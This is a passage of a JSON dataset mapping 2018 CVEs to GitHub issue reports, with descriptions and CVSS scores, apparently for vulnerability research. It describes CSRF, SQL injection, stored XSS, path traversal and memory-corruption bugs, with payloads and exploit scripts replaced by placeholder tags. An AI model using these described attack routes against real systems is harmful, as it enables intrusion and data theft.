  21640. "description": "FILETAG FILETAG NUMBERTAG Karena tidak terdapat CSRF token yang unique, maka fitur tersebut dapat dieksploitasi menggunakan serangan CSRF. Berikut ini merupakan script exploit untuk serangan CSRF tambah akun selevel admin. ERRORTAG NUMBERTAG Apabila script diatas dilempar dan tereksekusi oleh pengguna (admin) yang sedang login pada sistem opensid, maka secara otomatis akan menambahkan pengguna baru. FILETAG FILETAG NUMBERTAG Setelah akun selevel admin berhasil ditambahkan, tentu akun tersebut dapat digunakan untuk login ke opensid dan mengambil alih sistem tersebut. Seperti apa yang diharapkan? Perlu menambahkan unique token CSRF pada setiap perubahan data baik pada method POST maupun GET untuk menghindari serangan jenis ini. Apa yang terjadi? Melalui bug CSRF ini, sistem bisa saja diambil alih oleh attacker. Namun untuk berhasil atau tidaknya, perlu adanya interaksi antara attacker dan korban. Bila korban mengakses script exploit CSRF pada saat kondisi login, maka serangan berhasil. Informasi tambahan | Tanya | Jawab | | | Versi APITAG | APITAG NUMBERTAG pasca | Versi PHP | PHP NUMBERTAG ubuntu NUMBERTAG System operasi | Ubuntu NUMBERTAG LTS",
  21641. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21642. "severity": "HIGH",
  21643. "baseScore": 8.8,
  21644. "impactScore": 5.9,
  21645. "exploitabilityScore": 2.8
  21646. },
  21647. {
  21648. "CVE_ID": "CVE-2018-13049",
  21649. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/4270",
  21650. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/4270",
  21651. "Repo_new": "glpi-project/glpi",
  21652. "Issue_Created_At": "2018-07-02T05:52:36Z",
  21653. "description": "NUMBERTAG SQL injection in FILETAG . Steps to reproduce (which actions have you made) : log in to GLPI and make the request FILETAG with the PoC. I sent the details of the vulnerability to glpi EMAILTAG rg Expected result : you can find the result in the SQL error.log Actual result : the same as the Expected result URL of the page : FILETAG Screenshot of the problem (if pertinent) : Your GLPI setup (you can find it in Setup > General menu, System tab) : you can find it in asset > computer",
  21654. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  21655. "severity": "HIGH",
  21656. "baseScore": 8.8,
  21657. "impactScore": 5.9,
  21658. "exploitabilityScore": 2.8
  21659. },
  21660. {
  21661. "CVE_ID": "CVE-2018-13050",
  21662. "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/1",
  21663. "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/1",
  21664. "Repo_new": "x-f1v3/forcve",
  21665. "Issue_Created_At": "2018-07-02T06:15:21Z",
  21666. "description": "Zoho manageengine Applications Manager SQL Injection vulnerability. Zoho manageengine Applications Manager SQL Injection vulnerability Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Proof of Concept: CODETAG This is a time-based blind SQL Injection vulnerability, so I used sqlmap to exploit it APITAG following is a proof screenshot. FILETAG Databases: FILETAG User: FILETAG Table: FILETAG data: FILETAG",
  21667. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21668. "severity": "CRITICAL",
  21669. "baseScore": 9.8,
  21670. "impactScore": 5.9,
  21671. "exploitabilityScore": 3.9
  21672. },
  21673. {
  21674. "CVE_ID": "CVE-2018-13065",
  21675. "Issue_Url_old": "https://github.com/SpiderLabs/ModSecurity/issues/1829",
  21676. "Issue_Url_new": "https://github.com/spiderlabs/modsecurity/issues/1829",
  21677. "Repo_new": "spiderlabs/modsecurity",
  21678. "Issue_Created_At": "2018-07-04T10:14:11Z",
  21679. "description": "Information about new CVETAG APITAG Adipta Basu). Hi, just to inform you that yesterday NUMBERTAG rd July NUMBERTAG was published as a presumptive vulnerability on APITAG NUMBERTAG The author writes that using the following two payloads, inside an argument on the request querystring, he was able to evade XSS filters: ERRORTAG and ERRORTAG . First: the author of the CVE has not included information about the ruleset that he used during his test. Second: if he used the CRS3, obviously both payloads are detected by the rule APITAG (XSS Attack Detected via libinjection) with a Paranoia Level set to NUMBERTAG I've written to APITAG including all this information and asking to tag this CVE as DISPUTED until the author gives more information. Based on what he has written on exploit db ( URLTAG it seems that he hasn't used any ruleset... otherwise he needs to specify it. Anyway, IMHO, the CVE description is wrong because it identifies APITAG as vulnerable instead of a rule or a ruleset. What do you think about it?",
  21680. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21681. "severity": "MEDIUM",
  21682. "baseScore": 6.1,
  21683. "impactScore": 2.7,
  21684. "exploitabilityScore": 2.8
  21685. },
  21686. {
  21687. "CVE_ID": "CVE-2018-13066",
  21688. "Issue_Url_old": "https://github.com/libming/libming/issues/146",
  21689. "Issue_Url_new": "https://github.com/libming/libming/issues/146",
  21690. "Repo_new": "libming/libming",
  21691. "Issue_Created_At": "2018-07-02T14:21:04Z",
  21692. "description": "Memory leak in parser.c. `jsx APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG ebba in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG b5e in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cb NUMBERTAG in APITAG PATHTAG NUMBERTAG dd NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG f in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG fdd8 in APITAG PATHTAG NUMBERTAG ebba in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cbbf in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG 
NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cbbf in APITAG PATHTAG NUMBERTAG fd5 in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG be NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG fca7 in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG eb9 in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG 
f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG c3a2 in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG f4bb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG fdfb in APITAG PATHTAG NUMBERTAG ebba in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG fbda in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cbbf in APITAG PATHTAG NUMBERTAG af0 in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f 
NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cbbf in APITAG PATHTAG NUMBERTAG af0 in APITAG PATHTAG NUMBERTAG f9 in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from 
NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG b2c5 in APITAG PATHTAG NUMBERTAG fe NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG edb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f9 in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG aaf9 in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG fe NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG fe NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG f9c5 in APITAG PATHTAG NUMBERTAG 
a NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG caf in APITAG PATHTAG NUMBERTAG fc in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG b5e in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). \u2019\u2018\u2019 poc URLTAG listswf $poc",
  21693. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  21694. "severity": "HIGH",
  21695. "baseScore": 7.5,
  21696. "impactScore": 3.6,
  21697. "exploitabilityScore": 3.9
  21698. },
  21699. {
  21700. "CVE_ID": "CVE-2018-13106",
  21701. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/489",
  21702. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/489",
  21703. "Repo_new": "clippercms/clippercms",
  21704. "Issue_Created_At": "2018-07-03T13:32:02Z",
  21705. "description": "Stored XSS is found in CMS Clipper NUMBERTAG version. Affected Version : Clipper NUMBERTAG Affected URL: PATHTAG Steps to POC NUMBERTAG Under Tools > Configuration, found multiple stored XSS APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG",
  21706. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  21707. "severity": "MEDIUM",
  21708. "baseScore": 4.8,
  21709. "impactScore": 2.7,
  21710. "exploitabilityScore": 1.7
  21711. },
  21712. {
  21713. "CVE_ID": "CVE-2018-13112",
  21714. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/477",
  21715. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/477",
  21716. "Repo_new": "appneta/tcpreplay",
  21717. "Issue_Created_At": "2018-07-03T07:03:24Z",
  21718. "description": "heap buffer overflow in PATHTAG function get_l2len. heap buffer overflow in PATHTAG function get_l2len command: APITAG asan report: ERRORTAG",
  21719. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  21720. "severity": "HIGH",
  21721. "baseScore": 7.5,
  21722. "impactScore": 3.6,
  21723. "exploitabilityScore": 3.9
  21724. },
  21725. {
  21726. "CVE_ID": "CVE-2018-13121",
  21727. "Issue_Url_old": "https://github.com/921580451/RealOnePlayer-sBug/issues/1",
  21728. "Issue_Url_new": "https://github.com/921580451/realoneplayer-sbug/issues/1",
  21729. "Repo_new": "921580451/RealOnePlayer-sBug",
  21730. "Issue_Created_At": "2018-07-03T03:32:44Z",
  21731. "description": "There is a Denial of service vulnerability. Using APITAG Build NUMBERTAG to open the file in the archive will cause a crash. FILETAG",
  21732. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  21733. "severity": "MEDIUM",
  21734. "baseScore": 5.5,
  21735. "impactScore": 3.6,
  21736. "exploitabilityScore": 1.8
  21737. },
  21738. {
  21739. "CVE_ID": "CVE-2018-13122",
  21740. "Issue_Url_old": "https://github.com/Self-Evident/OneFileCMS/issues/49",
  21741. "Issue_Url_new": "https://github.com/self-evident/onefilecms/issues/49",
  21742. "Repo_new": "self-evident/onefilecms",
  21743. "Issue_Created_At": "2018-07-03T14:12:25Z",
  21744. "description": "onefilecms.php in APITAG through NUMBERTAG might allow attackers to delete any file or folder they want on the delete screen. Access FILETAG with a username/password FILETAG access URLTAG FILETAG Click APITAG FILETAG",
  21745. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  21746. "severity": "MEDIUM",
  21747. "baseScore": 6.5,
  21748. "impactScore": 3.6,
  21749. "exploitabilityScore": 2.8
  21750. },
  21751. {
  21752. "CVE_ID": "CVE-2018-13123",
  21753. "Issue_Url_old": "https://github.com/Self-Evident/OneFileCMS/issues/50",
  21754. "Issue_Url_new": "https://github.com/self-evident/onefilecms/issues/50",
  21755. "Repo_new": "self-evident/onefilecms",
  21756. "Issue_Created_At": "2018-07-03T14:21:03Z",
  21757. "description": "FILETAG in APITAG through NUMBERTAG might allow attackers to read sensitive files such as passwd. onefilecms.php in APITAG through NUMBERTAG might allow attackers to read sensitive files such as passwd: access APITAG FILETAG",
  21758. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21759. "severity": "CRITICAL",
  21760. "baseScore": 9.8,
  21761. "impactScore": 5.9,
  21762. "exploitabilityScore": 3.9
  21763. },
  21764. {
  21765. "CVE_ID": "CVE-2018-13136",
  21766. "Issue_Url_old": "https://github.com/ultimatemember/ultimatemember/issues/456",
  21767. "Issue_Url_new": "https://github.com/ultimatemember/ultimatemember/issues/456",
  21768. "Repo_new": "ultimatemember/ultimatemember",
  21769. "Issue_Created_At": "2018-06-08T11:44:43Z",
  21770. "description": "Security Issue. Ultimate Member Version Tell us what UM core version you use NUMBERTAG Subject of the issue Persistent XSS vulnerability. Steps to reproduce the behavior APITAG page title as APITAG APITAG APITAG Ultimate Member > Settings; it will be reflected in the General tab (all vectors). APITAG reset NUMBERTAG D NUMBERTAG",
  21771. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21772. "severity": "MEDIUM",
  21773. "baseScore": 6.1,
  21774. "impactScore": 2.7,
  21775. "exploitabilityScore": 2.8
  21776. },
  21777. {
  21778. "CVE_ID": "CVE-2018-13139",
  21779. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/397",
  21780. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/397",
  21781. "Repo_new": "libsndfile/libsndfile",
  21782. "Issue_Created_At": "2018-07-03T04:08:59Z",
  21783. "description": "stack buffer overflow in psf_memset in PATHTAG stack buffer overflow in psf_memset in PATHTAG FILETAG ./sndfile deinterleave $poc NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffea NUMBERTAG d0 at pc NUMBERTAG f NUMBERTAG a3bec bp NUMBERTAG ffea NUMBERTAG e2f0 sp NUMBERTAG ffea NUMBERTAG da NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffea NUMBERTAG d0 thread T NUMBERTAG f NUMBERTAG a3beb in __asan_memset ( PATHTAG NUMBERTAG f NUMBERTAG fc NUMBERTAG bf in psf_memset PATHTAG NUMBERTAG f NUMBERTAG ed NUMBERTAG in sf_readf_int PATHTAG NUMBERTAG e1c in deinterleave_int PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG bed NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c8 in _start ( PATHTAG ) Address NUMBERTAG ffea NUMBERTAG d0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a5 in main PATHTAG",
  21784. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21785. "severity": "HIGH",
  21786. "baseScore": 8.8,
  21787. "impactScore": 5.9,
  21788. "exploitabilityScore": 2.8
  21789. },
  21790. {
  21791. "CVE_ID": "CVE-2018-13153",
  21792. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1195",
  21793. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1195",
  21794. "Repo_new": "imagemagick/imagemagick",
  21795. "Issue_Created_At": "2018-07-04T08:05:57Z",
  21796. "description": "memory leak bug in APITAG APITAG function. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG hello,i find a memory leak bug in imagemagick,the details is on the Steps to Reproduce. Steps to Reproduce <! List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code ( ERRORTAG filelist=(char ) APITAG )); CODETAG if ((status == APITAG || (number_files NUMBERTAG if (number_files NUMBERTAG ERRORTAG APITAG ) NULL); } ERRORTAG filenames); APITAG ) NULL); }` APITAG",
  21797. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  21798. "severity": "MEDIUM",
  21799. "baseScore": 6.5,
  21800. "impactScore": 3.6,
  21801. "exploitabilityScore": 2.8
  21802. },
  21803. {
  21804. "CVE_ID": "CVE-2018-13250",
  21805. "Issue_Url_old": "https://github.com/libming/libming/issues/147",
  21806. "Issue_Url_new": "https://github.com/libming/libming/issues/147",
  21807. "Repo_new": "libming/libming",
  21808. "Issue_Created_At": "2018-07-04T12:38:26Z",
  21809. "description": "SEGV on decompile.c. ERRORTAG swftotcl $poc URLTAG",
  21810. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  21811. "severity": "MEDIUM",
  21812. "baseScore": 6.5,
  21813. "impactScore": 3.6,
  21814. "exploitabilityScore": 2.8
  21815. },
  21816. {
  21817. "CVE_ID": "CVE-2018-13251",
  21818. "Issue_Url_old": "https://github.com/libming/libming/issues/149",
  21819. "Issue_Url_new": "https://github.com/libming/libming/issues/149",
  21820. "Repo_new": "libming/libming",
  21821. "Issue_Created_At": "2018-07-04T13:18:41Z",
  21822. "description": "An integer overflow . ERRORTAG swftotcl $poc URLTAG",
  21823. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  21824. "severity": "MEDIUM",
  21825. "baseScore": 6.5,
  21826. "impactScore": 3.6,
  21827. "exploitabilityScore": 2.8
  21828. },
  21829. {
  21830. "CVE_ID": "CVE-2018-13339",
  21831. "Issue_Url_old": "https://github.com/TylerGarlick/angular-redactor/issues/77",
  21832. "Issue_Url_new": "https://github.com/tylergarlick/angular-redactor/issues/77",
  21833. "Repo_new": "tylergarlick/angular-redactor",
  21834. "Issue_Created_At": "2018-07-05T09:34:36Z",
  21835. "description": "XSS Vulnerability Discovered. Description: The stored XSS can be triggered once you edit content using Redactor NUMBERTAG in HTML mode. POC NUMBERTAG I pen-tested the official showcase website of Redactor NUMBERTAG URLTAG it has a demo editor on its front page. Then, click the icon to use HTML content mode: FILETAG NUMBERTAG inject the XSS payload APITAG APITAG NUMBERTAG XSS discovered! APITAG APITAG",
  21836. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21837. "severity": "MEDIUM",
  21838. "baseScore": 6.1,
  21839. "impactScore": 2.7,
  21840. "exploitabilityScore": 2.8
  21841. },
  21842. {
  21843. "CVE_ID": "CVE-2018-13339",
  21844. "Issue_Url_old": "https://github.com/gleez/cms/issues/796",
  21845. "Issue_Url_new": "https://github.com/gleez/cms/issues/796",
  21846. "Repo_new": "gleez/cms",
